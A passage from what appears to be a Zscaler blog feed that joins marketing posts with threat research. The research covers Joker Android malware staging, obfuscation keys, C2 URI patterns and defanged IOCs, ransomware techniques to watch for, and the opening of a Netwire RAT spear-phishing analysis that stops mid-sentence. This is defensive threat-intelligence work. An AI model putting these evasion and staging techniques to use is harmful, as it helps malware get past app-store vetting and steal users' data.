increase risk, and allow lateral movement across the environment. Traditional access services hinder user productivity by introducing latency from backhauling traffic to the data center, leading to user complaints, frustration, and less motivation. Lack of insight into user-to-app experience leads to blind spots and makes it difficult to find and fix performance issues. Traditional services are limited to the capacity of appliances and struggle to scale in a cost-effective manner as more remote workers are hired. Hackers are exploiting these new vulnerabilities when proper security is not deployed. In fact, findings from a joint report by SAP and Onapsis on cyber activity from mid-2020 to March 2021 reveals: Over 300 exploits targeting SAP systems were successful. Attackers attempted accessing SAP systems to modify configurations and users and exfiltrate business information. The earliest cyberattack was recorded within 72 hours after SAP released patches. A targeted cyber attack could compromise an account within 90 minutes. In one case, threat actors knew of the existing SAP security vulnerability before public disclosure and the release of proof-of-concept (PoC) code. Power your secure remote access and cloud transformation needs with Zscaler Zscaler Private Access (ZPA) is a cloud-delivered service from Zscaler that provides seamless, zero trust access to private applications, such as SAP, running on a public cloud or within the data center.. With ZPA connectivity, SAP is never exposed to the internet, making it completely invisible to unauthorized users. ZPA enables SAP to connect to users via inside-out connectivity versus extending the corporate network to them via VPN or VDI service. Users are never placed on the network. This zero trust network access (ZTNA) approach supports both managed and unmanaged devices and any private application (not just web apps). The result is better security, better visibility, and greater regulatory compliance. Companies like Growmark are already benefiting from ZPA’s ability to increase security and improve user access and experiences, even while users roamed on poor-quality rural connections. Eric Fisher, the IT Director at Growmark, noted: “We’re getting a better security footprint, better visibility and we’re more compliant.” Indeed, the benefits of leveraging Zscaler Private Access for SAP are multifaceted: Enable business continuity and hybrid-remote work: Empower the whole ecosystem of employees, partners, and customers to access all business apps (SaaS, or private apps in datacenter or public cloud from any device), from any location on any network. Embrace zero trust within your business: The Zscaler Zero Trust Exchange enforces business policies that follow the user and adapt based on changes in context, keeping users off-network, providing identical cyber threat and data protection everywhere. The Zscaler Zero Trust Exchange integrates with identity providers like Okta, Azure AD, and Ping conditional access, as well as endpoint security providers (CrowdStrike, Microsoft, and Carbon black) to adapt policies based on context. Leverage Zscaler’s globally distributed secure access service edge: Over 150 global cloud edge locations provide faster access and higher user productivity. Monitor digital experience Zscaler ZDX monitoring provides visibility all the way from the user endpoint to the application, and proactively resolves user experience issues in any location around the world, in just minutes. The 100% cloud-native service scales cost-effectively to better meet business needs. ZPA and SAP can be configured in just minutes In fact, securing access to SAP can be done in three easy steps:: Install ZPA App Connector next to SAP on-prem or in-cloud Deploy lightweight ZPA software Client Connector on user workstations Get single point of management for policies, etc. Certified for Secure Remote Access to SAP In addition, a topic that is top of mind for CIOs and CISOs today is how to protect business-critical applications during a cloud migration process, while providing uninterrupted, global remote access. Most enterprises today are migrating SAP ECC (ERP Central Components) to S/4HANA. S/4HANA allows customers to choose from a broad range of “4+1” cloud infrastructure providers, including AWS, Azure, GCP, Alibaba, and SAP’s own HANA Enterprise Cloud. Migrating an ERP platform that touches every part of your business, customers, and suppliers without disruption is a complex undertaking. Zscaler Private Access simplifies and speeds up migrations by reducing the networking complexities typically encountered when moving users from an on-premise application into a cloud-hosted environment. Once end-users are configured to use the ZPA Client Connector, administrators are freed up to focus on back-end migration tasks. Moreover, users can be terminated from one back-end and connected to another with a simple policy update in the ZPA administration console. The result is simpler SAP migrations that can be completed in less time. Simplified Migration to S/4HANA Enterprise Cloud Zscaler is an SAP PartnerEdge Build Partner and is proud to announce that ZPA is listed as a supported product on SAP’s 2021 HANA Enterprise Cloud Advanced Edition Roles and Responsibilities document. This gives customers the confidence knowing that ZPA has passed SAP’s rigorous processes for determining interoperability with SAP applications. And the benefits don’t stop here. ZPA for SAP is just one example of how the Zscaler Zero Trust Exchange can enhance security, improve user experiences, and leverage policy to easily streamline application access and cloud migration. For more information on Zscaler solutions for SAP, please visit Zscaler ZPA for SAP. Thu, 22 Jul 2021 08:00:01 -0700 Nicole Bucala Joker Joking in Google Play Joker is one of the most prominent malware families targeting Android devices. Despite public awareness of this particular malware, it keeps finding its way into Google’s official application market by employing changes in its code, execution methods, or payload-retrieving techniques. This spyware is designed to steal SMS messages, contact lists, and device information, and to sign the victim up for premium wireless application protocol (WAP) services. Zscaler’s ThreatLabz research team has been constantly monitoring the Joker malware. Recently, we observed regular uploads of it onto the Google Play store. ThreatLabz notified the Google Android Security team, who have taken prompt action to remove the suspicious apps (listed below) from the Google Play store. This prompted us to evaluate how Joker is so successful at getting around the Google Play vetting process. We saw 11 different samples regularly uploaded to Google Play recently clocking 30k installs. The following are the names of the infected apps we discovered on the Google Play store: Free Affluent Message PDF Photo Scanner delux Keyboard Comply QR Scanner PDF Converter Scanner Font Style Keyboard Translate Free Saying Message Private Message Read Scanner Print Scanner Targeted Categories: Joker malware authors have targeted some categories of apps more than others. Based on the 50+ payloads we have seen in the last 2.5 months, we have found the following 5 categories being targeted the most heavily: Health & Fitness Photography Tools Personalization Communication The “Tools” category has been the favorite target of the Joker malware author, accounting for 41% of the total payloads we have seen. “Communication” and “Personalization” are the next most affected categories with 28% and 22% of payload uploads respectively. The “Photography” category saw 7% payloads. “Health & Fitness” made up the final 2% of payloads; we believe this category is a new addition as we have not seen this category targeted previously. Publisher Names: Joker authors appear to use a name dictionary system to derive the publisher names for their malicious apps. All the Joker dropper malware have used full (first and last) names for developers, as shown below. Each developer has only one app registered to them as well. Such information serves as indicators to help us identify potential Joker malware -- though these criteria can certainly apply to legitimate apps as well. New Tactics From Joker Malware Authors: Joker is well known for changing its tactics to bypass the Google Play store vetting process. This time we saw Joker using URL shortener services to retrieve the first level of payload. Unlike the previous campaign where the payloads were retrieved from the Alibaba Cloud, in this campaign we saw the Joker-infected apps download the mediator payload with URL shortener services like TinyURL,,, or to hide the known Cloud service URLs serving stage payloads. Fig 1: URL shortener service TinyURL Fig 2: URL shortener service Example execution flow: C2 Changes: From the previous encounter, we also observed updated command and control center (C2) URIs. In the previous campaign, we saw the C&C URI pattern was “/k3z0/B9MO/” which changed in the newer payload to “/svhyqj/mjcxzy”. Fig 3: Old C2 communication Fig 4: New C2 communication String Obfuscation Key Changes: In the previous campaign, we saw the end payload use the string “nus106ba” to obfuscate the important information. It has been changed to “nus35ba” which can be observed in the below screenshot. We have also observed that the string which obfuscates sensitive strings such as C2 addresses keeps changing with the format “nus*ba” (where * represents a 2 or 3 digit number). Fig 5: String Obfuscation examples Fig 6:String Obfuscation examples Abusing The Notification Access: In this campaign, the Joker malware payloads abuse the notification access functionality. Once installed, the malware prompts for notification access to the user as shown in the below screenshot. The notification access grants permissions to potentially read all notifications posted by the device and any other installed applications. Once these settings have been allowed by the user, the malware has the control it needs to carry out its malicious activities. Fig 7: Notification Access Following is the code routine for Notification access by stager payload. Fig 8: Code Routine for Notificationation Access Abuse Following is the code routine for Notification access by the final payload. Fig 9: Code Routine for Notification Access Abuse New Variant Or Smart New Stage Payload? In analyzing the Joker campaign from the past two months, we came across two instances of what we consider to be the newest variant, which has substantial differences. The app Font Style Keyboard is found to incorporate new changes from the older payloads. In this Joker downloader app, we observed that the URL shortening service was leveraged to download the stage 1 payload. Fig 10: Stage 1 Payload delivery URL The Google Play store app connects to the URL shortener service which then responds with the URL to download the stage 1 payload. Fig 11: Stage 1 download from Google Play Store app Like the normal Joker campaign, this stage 1 payload has an embedded URL to download the next stage payload or the final stage payload. In this piece of malware, we saw the end payload was retrieved from the stage 1 payload as shown below. Fig 12: Embedded second-stage payload. Fig 13: Download of a second-stage payload. From this point on, this variant deviates quite a bit from the normal routine of the Joker Campaign. In the previous Joker campaigns (or even the recent examples shown at the start of the writeup), the embedded URL in stage one was directly serving the Dalvik executables which are loaded by the stage one payload for further execution. In the new variant, the embedded URLs now serve the raw data which is later converted to the next stage payload via an XOR operation with a hardcoded key as shown in the below figure. Fig 14: XORed with hardcoded key Along with the XORed stage payload, another change to the stage binaries is that now the Joker stage payload also checks to see if specific apps are installed on the infected devices. Observe below. Fig 15: Checks for the installed apps The following are the apps that the stage payload checks for. These are also available on the Google Play store. The stage payload will only continue certain activities if any of the above apps are not installed on the infected devices. From the listed apps categories and developer names we assume that these are again Joker-related apps that can be used to assess the infected devices. However, by the time of writing this, two of these apps have been taken down by the Google Play store and the rest are not working in our environment, so we cannot confirm that these are Joker malware. Unlike the previous Joker campaigns, the stage payload is also doing command and control communication. The below screenshot exhibits the activity from the staged payload. In the normal routine, we did not observe any network activity from the staged payload apart from straightforward downloads of the next stage payload. In this sample, we have found the staged payload connects to the gaikai[.]work domain by sending device information and receiving the commands from the server. Fig 16: C2 from stage payload Along with this, we are also observing that the stage payload uses a XXTEA algorithm to encrypt the data being served to and by the C2 server. Below is the code routine for encryption and decryption of data with the hard-coded key. Fig 17: XXTEA encode and decode We believe stage payload C2 activity is mainly used to screen the infected mobile phones that meet the trigger condition. The C2 server can issue an error_code field with a return value on which the malware will act accordingly to trigger certain malicious activities including SMS operations. Fig 18: XXTEA decode In the normal Joker infection cycle the intermediate payloads will directly drop the final stage payload, whereas in this smart stage payload, we saw the final stage payload will only be downloaded if the infected device has a Thailand Mobile SIM card. Observe the below screenshot. Fig 19: Final stage download. Conclusion: The Joker malware authors are very active and innovating on their tactics in their attempts to bypass the vetting process of the Google Play store. Judging by the number of payloads uploaded to Google Play, we can safely say that the Joker malware authors are succeeding in their efforts. At ThreatLabz, we constantly monitor the newly added apps to the Google Play store for such incidents and help remove them from the Google Play store by collaborating with the Google Security Team. The Google Play store is not the only place that Joker malware can be found. These same apps are uploaded to other third-party app stores as well due to those stores’ regular crawling activities on the Google Play store. Malicious apps have been promptly removed from the Play store upon being reported by the security community or caught by their vetting process, but these apps can live longer in the third-party app stores who do not perform these same actions. Hence, we still recommend using Google Play store for downloading any mobile app. Package Names: com.affluent.messenger Free Affluent Message PDF Photo Scanner com.delux.Keyboard delux Keyboard com.comply.qrscan Comply QR Scanner com.converter.pdfscanner PDF Converter Scanner r4d236dTy.rc5a682Ty.r7a6011Ty Font Style Keyboard com.text.translate.freegp Translate Free say.freetext Saying Message messenger.message.private Private Message com.totalcomapp.barcodereader Read Scanner com.scanner.sad.msgf.wq Print Scanner IOCs: aiyama[.]oss-eu-west-1[.] aiyama[.]oss-eu-west-1[.]aliyuncs[.]com/P[.]pic aiyama[.]oss-eu-west-1[.]aliyuncs[.]com/ys[.]pic tatamm[.]oss-us-west-1[.] tatamm[.]oss-us-west-1[.]aliyuncs[.]com/bac[.]pic tatamm[.]oss-us-west-1[.]aliyuncs[.]com/tat[.]pic voicesp[.]oss-us-east-1.aliyuncs[.]com hd-background[.]oss-ap-southeast-1[.]aliyuncs[.]com/free aiyama[.]oss-eu-west-1[.] 61toolll[.]oss-us-east-1[.]aliyuncs[.]com/funny_sub 0701baibao-1305586011[.]cos[.]ap-nanjing[.] 0701baibao-1305586011[.]cos[.]ap-nanjing[.]myqcloud[.]com/sub warriorss[.]oss-us-west-1[.]aliyuncs[.]com/xhw/sub[.]apk kadmg[.]oss-me-east-1[.]aliyuncs[.]com/apps C&C: 161[.]117[.]46[.]64 gaikai[.]work spotifyly[.]world Tue, 20 Jul 2021 10:02:26 -0700 Viral Gandhi Stop Unnecessary “APPification” of Your Core Systems This post also appeared on LinkedIn. Enterprises are embracing mobile and cloud technology benefits in order to foster company-wide digital transformation. But with this movement comes a new set of issues: how do you cost-effectively push core business processes and applications to a mobile and remote workforce without compromising security? CIOs at banking, financial services, and insurance (BFSI) companies increasingly manage large projects that extend primary business functions such as core banking systems (CBS) and insurance policy admin systems (PAS) to mobile workers through app extensions. The “APPification” of these core banking functions aims to provide field employees with a simple, speedy, and secure method of helping customers make decisions and engage in services remotely. But do they? Already-taxed dev teams must now create, manage, and maintain multiple systems instead of just one. Is the APPification of core services helping or hindering business objectives? Users need mobile access Most banks and insurers have employees in the field selling retail products such as loans, credit cards, and insurance policies to new customers, or assisting current customers with new product options or opportunities. To provide and collect the best information for quotes, policies, coverage details, terms and conditions, and other data, field staff need access to core banking and insurance systems. Establishing and maintaining secure remote connections to core business applications is a major headache for enterprise security teams: remote connections not only require extra security infrastructure, but also that employees follow the security policies. Virtual private networks (VPNs) are one option. But VPNs require user traffic to cross a stack of appliances such as load balancers, DDoS, firewalls, and VPN concentrators—each adding latency to the transaction. Field reps, seeking faster connectivity speed, could “go rogue,” and bypass VPN controls, which could open the corporate network to bad actors. One solution to the remote access challenge is creating mobile apps for loan origination and policy quote engines, packaging them inside a mobile device manager (MDM) container, and using real-time webservices or APIs that connect to core systems. But “APPification” creates new headaches for IT leads. Apps: tighter security, but higher price While appification may solve immediate end-user access problems, using mobile apps to extend existing CBS or PAS services can lead to complications: Increased development overhead: Creating a set of mobile apps, often for both the Android and iOS platforms, can be taxing for development teams. Ensuring compatibility and service quality across different OS versions, device screen sizes, and new mobile device models can be a nightmare for your dev teams. Frequent change requests: New workflows must be designed, maintained, tested, and rolled out for processing app change requests. Higher demand for end-user support: Supporting apps across multiple devices and platforms can become a full-time endeavor. Often, additional monitoring tools are needed to detect app crashes or performance issues. Lack of development resources: Developing mobile apps is a competence in and of itself, and quite distinct from the skill sets needed to develop core apps. Enterprise IT is often short-staffed of good mobile app design and development talent. Often mobile-app development gets outsourced to vendors, which increases IT spend, adds third-party management administration responsibilities, and introduces new security issues. Poor field adoption and ROI: If the mobile-app user experience is bad, user adoption will lag. Mobile-app user workflows must be simple and easy to learn. If mobile applications aren’t used, the efforts and resources spent developing them are wasted. And alternative access could compromise enterprise network security by extending the corporate-network threat surface. A better way So the key question is not “how do we build better mobile apps?” Instead, IT leads must ask “Are mobile apps worth the effort?” and “Is there a better way to give field staff secure access to core business processes?” The answer to both is “yes.” Ubiquitous mobile broadband access, increasing cellular speeds over LTE (now moving to 5G), and public Wi-Fi hotspots facilitate remote work from anywhere (like customers’ homes, hotels, or coffee shops). Allowing employees access to CBS and PAS applications from the field with the same ease as access from HQ or a branch office means there is no need for mobile-app extensions. However, legacy connectivity models can impede progress. VPNs—intended to secure workers—can introduce lag: More employees contend for limited bandwidth to connect to the corporate data center while data is backhauled via bottlenecked security gateways. Worse, hardware security costs can skyrocket with the need to scale up remote access. The “castle-and-moat” security model isn’t built for the way enterprise business networks are evolving, with thousands of remote workers trying to access applications that are increasingly moving from private data centers into public clouds. Zero trust architectures are a better way Inline, cloud-based security services can connect users to applications seamlessly and with all security controls in place and inline. A zero trust architecture typically employs a cloud-security model to support fundamental principles of default-deny posture and follow-the-user policy controls. In this way, zero trust extends security protection to mobile devices so that field staff can access core applications with the same level of security controls as HQ-based workers. Gartner says that by 2023, 60% of enterprises will phase out most of their remote access virtual private networks (VPNs) in favor of zero trust architectures. A zero trust architecture cloud service allows: Close proximity to users wherever they are: Effective remote access requires a global, cloud-delivered, edge-computing service with points of presence close to all users. Continually-secured access: Users should never be placed “on the network,” and instead connect only to applications as allowed by configured business policies. (Contrast that with VPN access which tenuously extends the corporate network beyond the limits of its effective control.) Authentication based on users and applications: Users and devices are authenticated first before access to an application is provided (unlike VPN, where users get access to the network first). Direct access to applications: Users go directly to applications, wherever they reside: in data centers, in the public clouds, etc. Zero Trust allows access to the fastest path between the user location and application hosted location without backhauling through the corporate security structure, thereby considerably improving application performance and user experience. Users access only to necessary applications: Authenticating users and access to applications based on set policies means that those users only have access to what they need, not the whole network. (This reduces “east/west” vulnerability: In the old model, if a threat actor breaches a network, the threat actor can move within the perimeter.) Zero trust services also provide cost avoidance for enterprises: Less security infrastructure: With zero trust, companies can scale back and reduce spending on the security appliance stack for managing inbound data center traffic from remote users. This includes VPN gateways, load balancers, and DDoS services. Less spending for mobile app development: Allowing access to core business apps eliminates the need for developing duplicate mobile application equivalents. It frees up resources or budgets that would be dedicated to creating, rolling out, managing, and maintaining mobile apps. Secure zero trust access to core business applications eliminates “APPification” With a zero trust architecture, enterprises with large numbers of remote employees using core business applications can optimize that access with better security and performance. They leverage the power of digital transformation by using the internet to access applications both in data centers and in the cloud, without exposing corporate network information to bad actors looking for breach opportunities. Zero trust architectures create: Access that is adaptive and identity-aware Access to applications anywhere, anytime, by any authorized user “Virtual perimeters” around user, device and application so that company asset security is assured Zero trust architectures provide secure connections between remote field employees and the applications they need, removing the need for costly security stacks protecting core business apps, VPNs, or any efforts to “APPify” crucial business processes. Thu, 15 Jul 2021 08:00:01 -0700 Sudip Banerjee Active Defense Strategies for Kaseya-style Ransomware Attacks The recent Kaseya ransomware incident combined the worst possibilities the infosec community has had to contend with in recent months: A supply-chain attack Ransomware An unpatched application vulnerability (zero day) This is by no means an isolated incident. All vulnerabilities reported on widely used software products, especially those that do not require authentication to exploit, will likely become a target to spread ransomware. Attacking the supply chain is simply a cost-effective way to scale ransomware operations. In this blog post, we’ll use the Kaseya incident as a blueprint to recommend a short playbook for what you can do while you await a patch for any software vulnerability you know nothing about. View our recent webinar for more information on the best defenses against Kaseya supply-chain and similar attacks. Zero days and active defense Zero days are a tough nut to crack. The average organization uses hundreds of different types of software and tools. It’s almost impossible to have an accurate software inventory, let alone account for issues like supply-chain attacks and zero days. While the research community plugs away trying to proactively find and hunt bugs to remediate costly zero days in widely used software before adversaries do, Active Defense allows security teams to take a step back and evaluate the problem of zero days as a whole. Active Defense shifts the focus of security teams away from individual software and esoteric, difficult-to-parse exploitation techniques to proactive defensive strategies while they wait for a patch to be installed. By hypothesizing the objectives that adversaries achieve when exploiting Zero Days, we can plan our Active Defenses in a manner that can: Reduce the impact of exploitation Give an early warning of malicious activity Gather intelligence on the adversary Zero days through the kill-chain The following table demonstrates where zero days are likely to be used in the kill-chain: Kill-Chain Phase Possible Zero-Day Targets Possible Motivation Initial Infection and foothold Internet-facing software applications and services Obtain access to a high-value environment Privilege escalation Operating system components and locally installed software Obtain a higher level of privilege to aid the rest of the kill-chain Lateral movement Distribution software and internally exposed services Expand attack footprint in locked-down environments Action on objectives Zero days against specialized software Exploit weaknesses to steal data Zero days are a means to the end goal. Whether in the initial stages of the operation or the critical last step. From a defensive perspective, this gives us a valuable advantage: If we cannot stop the zero day itself, we have opportunities to trap the adversary either before or after they use it. And you can do just that with Active Defense. Actively defending against Kaseya-style incidents The scenario here is that you know about a zero-day target that does not yet have a patch. Let us also assume that the zero day is being used for initial infection and foothold to distribute ransomware within the environment. The following table shows strategies for actively defending against techniques observed in the Kaseya REvil Ransomware incident. Phase Technique Active Defense Tactic Hints, Tips, Tricks Initial infection Exploit an internet-facing application Create public-facing decoys to capture intelligence Use the application vulnerable to the zero day as a template for the decoy Execution Use of PowerShell Monitor for commands and scripts that involve stopping or disabling services N/A Defense evasion Kill processes and services Deploy decoy processes and services commonly killed by ransomware The most commonly attacked processes are those that lock files that are a target for encryption; therefore, “outlook.exe”, MS Office processes, and database processes are usually targeted Pre-encryption checks Delete volume shadow copies Monitor for the deletion of volume shadow Typically, volume shadow copies are deleted using vssadmin.exe or WMI Encryption Encrypt files Deploy decoy files on endpoints to monitor for file modification events Placing files in common encryption start locations (such as C:\ or %appdata% or Document folders) is a smart way to minimize the impact of encryption In the case of Kaseya, specifically, there was no worm-like behavior observed as the encryptor was pushed to machines via an update. Beware of distribution points One of the classic strategies these days, as seen in the Kaseya incident, is to compromise software and update distribution points to deploy ransomware at scale. It is not a stretch to say that any software that installs updatable services on endpoints can be a target of similar attacks and the table in the previous section is the best form of defense for that. We wish to draw attention to two pervasively present distribution points for ransomware in most organizations: Active Directory SCCM With recent disclosures around serious vulnerabilities—the Print Nightmare Vulnerability, for example—organizations are at risk of both Active Directory and SCCM as targets for any ransomware that leverages such a vulnerability to spread. Here are four suggestions to actively defend against techniques in such a scenario. Phase Technique Active Defense Tactic Internal recon (Active Directory) Query Active Directory for privileged users with rights to create a group policy Plant decoy users in privileged groups and OUs Internal recon (Active Directory) Query Active Directory for SCCM servers Plant decoy systems with attributes consistent with SCCM servers Lateral movement via zero days like Print Nightmare Use the Print Nightmare vulnerability to obtain RCE on Active Directory and SCCM Disable the print spooler service on AD and SCCM Plant a decoy system on the network with hostname and DNS indicating it is an SCCM server Lateral movement Creation of new group policy or SCCM policy to distribute encryptor Monitor and log the creation of new policies Closing Notes Organizations should expect that any major vulnerability disclosed is likely to become a target for spreading ransomware. Due to the unpredictability of TTPs that may be used in individual incidents, we advise organizations to adopt a wider array of Active Defense techniques to build resilience against a variety of ransomware operator strategies. We also encourage organizations to adopt Active Defense and deception strategies in the following parts of their IT environment: DMZ (both external and internal segments) Data center segments hosting business-critical applications for east-west lateral movement Active Directory Privileged endpoints Endpoints of personnel interacting with sensitive applications Learn more about Kaseya Supply-Chain ransomware attack by viewing our webinar hosted by ThreatlabZ. Wed, 14 Jul 2021 16:25:53 -0700 Deepen Desai IoT in the Enterprise Report: Empty Office Edition It happened overnight for many enterprises. Bustling offices turned into desolate spaces--abandoning plants to die, snacks to go stale, and calendars to remain frozen in time. And like out of a movie, amidst the eerie quiet there was something still alive and buzzing with activity. Neglected in the buildings, set top boxes, digital signage, networked printers, and many other IoT devices were still connected to the network. As if nothing had changed, the devices continued to refresh data, perform functions, and await commands. But unlike the other forsaken objects on the shelves, IoT devices drew an inordinate amount of attention. Threat actors quickly identified the devices as attack opportunities, resulting a staggering 833 IoT malware blocked every hour by the Zscaler cloud. In our latest research report, IoT in the Enterprise: Empty Office Edition, the Zscaler ThreatLabz threat research team takes a closer look at this activity to answer an important question: What happens when employees abandon their smart devices at work? Using data collected between December 14 and December 31, 2020, when most non-essential business offices were shut down, we completed two studies: an IoT device fingerprinting study that identified IoT devices and traffic and an IoT malware study based on data from the Zscaler cloud. The result—an eye-opening deep dive into both sanctioned and unsanctioned IoT devices and IoT malware attacks, showing tremendous growth in both. Key Findings IoT malware on corporate networks has increased by 700 percent year-over-year, despite much of the global workforce working from home Entertainment and home automation devices posed the most risk due to their variety, low percentage of encrypted communication, and connections to suspicious destinations 76% of IoT communications occur on unencrypted plain text channels Gafgyt and Mirai—malware families popularly used in botnets—accounted for 97 percent of the IoT malware payloads blocked by the Zscaler cloud Technology, manufacturing, retail & wholesale, and healthcare industries accounted for 98 percent of IoT attack victims Most attacks originated in China, the United States, and India Most targets for IoT attacks were in Ireland, the United States, and China Security Takeaways as Office Life Returns While some companies are beginning to phase employees back into corporate office spaces, the pandemic lessons of unprotected or improperly protected IoT devices remains unchanged at best. Today, the ever-growing breadth of IoT devices making its way onto corporate networks includes everything from smart watches and IP cameras to automobiles and musical furniture. As we’ve documented in our findings, these new categories of IoT are often completely off the radar for IT teams. At the same time, we’re witnessing these new attack vectors breed ingenuity among threat actors and hasten the need for organizations to employ zero trust policies and architectures. For many, IoT security and policy are still immature. The good news though is that now we have the data to understand these dangers, and a set of best practices that organizations of all sizes can implement to improve their IoT security posture. Download your copy of our latest report and get the full details of today’s IoT threats, including the most common devices, traffic patterns, countries devices route to, most targeted industries, and more to help you protect your corporate network. Thu, 15 Jul 2021 05:00:01 -0700 Viral Gandhi Using Machine Learning to Bridge the Gaps in Microsegmentation Microsegmentation has become more widely adopted in the cloud and data center because of its enormous promise. Breaking the network into smaller and smaller fragments (often as small as the individual workloads themselves) comes with significant security and performance benefits. According to some estimates, as much as 76% of the traffic in a network is east-west, so allowing only application communication necessary for business operations can interrupt attack progression. The problem, though, is that getting to that fully deployed and realized microsegmented environment is challenging. It requires fine-grained knowledge of the application communication patterns and application topologies of the network, with the second step being an inventory of what communication should be allowed and what shouldn’t. This leads to a large number of rules/policies, and large rule sets are difficult for humans to understand, manage and modify. Finally, the rules remain address-centric, which means that the translations from application policies to address-based rules is contained in people’s heads. To gain the advantages of microsegmentation requires a lot of work–and the work doesn’t stop, since networks continue to change. Is there some way to complete microsegmentation projects faster and more easily? To make them more accurate, and more resilient in the face of changing business and security challenges? Turns out, there is. A new approach We want to make application-centric, rather than address-centric, rules. Starting with collected data about which applications are communicating, we use machine learning to analyze the data and create a nearly optimal set of automatically generated rules. This moves much of the complexity from humans to computers, which, after all, are much better at sorting through lots of information. The machine learning isn’t used here to find malware; rather, it’s used to establish the state of the network—what is talking to what. We’re developing techniques to identify possibly suspicious activity from applications on a network—for now, the learned rules and our UI allow unexpected applications to be easily identified and dealt with. Once the rules are created, then people can begin to use human insight to protect their network. Because the rules are readable, and parsed explicitly in terms of protecting applications, the rules can be deployed application by application; a human network security expert can use their knowledge and insight to deploy (or edit) the rules in an optimal way. A human is usually better at deciding what applications should be protected first, so we make it easy to find the relevant rules for protecting the most important applications and to use the rules to lock down the application. Using machine learning Starting with all the network traffic, we want to create a set of rules with the following goals: As few rules as possible. Simplest rules, without superfluous information. More specific rules, rather than general rules. Human-readable rules. Rules with the broadest coverage possible. These goals are often in conflict with one another. It’s necessary to balance these priorities to get the optimal rules, though. These constraints, and the constraints created by the data, rule out most of the techniques used for machine learning. We ended up doing stochastic search through a space of candidate rules, maximizing a value based on the above constraints. If this sounds a little hard to understand, it’s not just you. Let’s try an analogy. Lost in New York Imagine you’re standing on a street corner in Manhattan with a latitude-longitude GPS. You know where you want to go, because you have the lat-long coordinates of your destination, but you don’t know which direction to start walking to get there. So you measure where you are and you walk a few blocks in one particular direction and look at your GPS again. If you’re closer to your destination than you were, then you stay at your new location and do it again. If you’re further away, you backtrack to where you started and then pick a different distance and direction. Sometimes, even if you’re a bit farther away, you still keep the new location, since maybe it’s a shortcut (or a way to get around Central Park!). As time goes on, you get closer to your destination, until nothing you do makes you any closer. You’ve arrived, more or less. Of course, Manhattan is two-dimensional, except for the tall buildings. When we’re looking through the space of possible rule sets, there are a lot more “directions” to investigate. That’s why we leave it to the algorithms. Applying machine learning to microsegmentation: faster to achieve, more secure There are three ways in which Zscaler machine learning makes policy suggestions, which I’ll describe in more detail below: Observe and describe the network’s intended state. Define optimized policies to enforce that observed/intended state. Continue to learn, adapt, and optimize policies while enforcing that intended state. Step 1: Observe and describe In this stage, we want to understand what the network is doing and what it's supposed to look like. Zscaler does this from the point of view of communicating applications, and uses knowledge of application communication patterns to identify anomalous traffic in the future that doesn't fit in with previously observed network patterns. Most people we talk with about our machine learning capabilities are really interested in this stage since application-centric policies are very different from what they've encountered before. We often have to describe in more detail what we do to accomplish this. Zscaler collects fixed, immutable data about applications–hundreds of attributes that can securely identify applications. Communication patterns between applications, and the hosts and users involved, are also stored. Within 48 hours (often less, depending on the nature of your network and how "locked down" it already is), there’s enough information for Zscaler to begin using machine learning to create policies automatically. Step 2: Define and enforce The wealth of information Zscaler collects about the applications and their communication patterns allows it to discover a nearly optimal set of policies that describe what’s been observed, using a relatively small number of features for each policy. Zscaler produces a set of policies that are dramatically smaller than sets constructed using address-based solutions. Plus they're easier to understand, so even managers who aren't application experts can understand how to secure them. For example, one customer previously required more than 13,000 address-based security policies to protect their applications. Zscaler was able to accomplish the same protection with several dozen application-based policies. That's the real benefit of combining application-based policy creation with machine learning. It becomes much easier to understand security, because the policies are few enough that you can browse them all, and clear enough that you can understand and act upon them. It’s important to note that these policies don't decide what's “good” or “bad” on the network; they only describe what's actually happening on the network, as efficiently and simply as possible. The goal is to make it as easy as possible for humans to understand what's happening on their network and decide for themselves whether a given suggested policy should be deployed, modified, or eliminated. Step 3: Learn and optimize It’s important to note that Zscaler machine learning doesn't stop after the first few days of use. Because application traffic on the network continues, and, more importantly, the network changes and the applications change, there's always more information to gather, and it may be new and different information than what was gathered initially. Hence, Zscaler continues to create new policy sets based on all the collected information. Since it would be likely that new policies could contradict (or confuse) existing policies, already-enforced policies are taken into account while creating new rules. For parts of the network where no policies are in place, however, Zscaler regularly updates its recommended policies to keep up with the evolving network and provides a current confidence score so users have a sense of how accurately the policies reflect current network behavior. These three stages—observation, creation, and optimization—explain how Zscaler creates policies that provide effective security and can be understood by people. This frees security professionals to do their most important job—protecting the most important applications on their network from attack—without excessive drudgery. That’s how the use of machine learning accelerates the time-to-deploy for a microsegmentation project from weeks or months to days, and allows users to create security policy without needing to write security policy. Read more: Blog: How Microsegmentation Differs from Network Segmentation On-Demand Webinar: Microsegmentation Made Easy with Identity and Automation Blog: Microsegmentation 101 Wed, 14 Jul 2021 09:15:20 -0700 John O'Neil Targeted Attack on Government Organizations Delivers Netwire RAT The Zscaler ThreatLabz team has observed an interesting spear phishing campaign beginning July 2021 in which a threat actor is targeting a wide range of organizations in Pakistan. NetwiredRC is being used as the final payload in this attack campaign. The combination of spear phishing and the use of information stealing RAT indicates that this is not a simple cyber crime, but a larger cyberattack campaign targeting multiple government organizations in Pakistan along with other industry verticals. Attack Cycle Figure 1: Attack chain Key features of this attack The attack has targeted multiple Pakistani government organizations using spear phishing emails. Lures use email info stolen from the actual website of the Pakistan government (Ministry of Information technology and telecommunication). The attack downloads its payload from the compromised website of the National College of Nepal located in Kathmandu. NetwireRAT, a well-known malware for stealing sensitive information, is being used as the final payload in the attack. Stolen information is sent using a proxy server in obfuscated form using the api WinHttpGetIEProxyConfigForCurrentUser() to command and control server 66[.]42.43.177:443 One of the latest spearphishing emails was sent from a spoofed email ID <> masquerading as “National Cyber Security Policy Feedback,” impersonating a government account which may be known by the target. During analysis, we found that the originating IP of the email is 209[.]58.188.82 which belongs to Hong Kong and has been reported for multiple phishing attacks in the past. Figure 2: Spoofed email from <> The email was sent on Wednesday, June 30, 2021 10:44 AM (PKT) with the subject “Cyber Security Policy Consultation Draft Final Update” to lure the recipients into opening an attached file named “NSCP-DRAFT-Final.docm”. The mail body contained information on the latest updates of the National Cyber Security Policy Draft along with the signature of a senior official to make the email look more professional and genuine. Upon further research, it seems that the email info has been copied from the Ministry of Information Technology & Telecommunication site. Figure 3: Email info from MoITT site. Digging into the message source of the email, we can see that the spearphishing email is targeting users from a number of different industry verticals. Figure 4: Originating IP and recipient email IDs from Message Source Looking at the Email ID of multiple users, we can see that multiple sectors are being targeted by the threat actor, including Energy, Agricultural, Chemicals, Educational, Telecommunication and Financial Sectors, among others. Distribution Strategy We have observed multiple documents being delivered in various spearphishing attacks. All the documents have exactly the same macro content with the same URL to download the final payload. 1.) The first document we analyzed has a macro code containing a PowerShell script to download the final 